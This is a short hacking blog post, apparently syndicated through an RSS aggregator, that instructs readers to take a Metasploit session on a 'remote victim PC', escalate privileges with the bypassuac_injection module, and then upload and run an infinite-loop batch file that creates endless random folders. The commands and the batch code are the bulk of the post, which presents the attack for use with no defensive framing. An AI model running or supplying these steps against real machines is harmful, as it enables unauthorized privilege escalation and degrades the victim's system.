Quantcast
Channel: Hacking Articles|Raj Chandel's Blog
Viewing all articles
Browse latest Browse all 1823

How to Create unlimited Folder in Remote Victim PC using Metasploit

$
0
0

Once you had a remote shell with Metasploit all now use the Bypass UAC module, set the session number and exploit it

Now type use exploit/windows/local/bypassuac_injection
msf exploit (bypassuac_injection)>set session 1

msf exploit (bypassuac_injection)>exploit


Open leafpad and type the following code.

:loop
md %random%
goto loop

Now save it as a batch file


Now Use the upload command to send Batch File to the target system.


 Now type shell to enter into Victims command prompt and execute the batch file. It will create unlimited blank folder in victim pc



Viewing all articles
Browse latest Browse all 1823

Trending Articles



<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>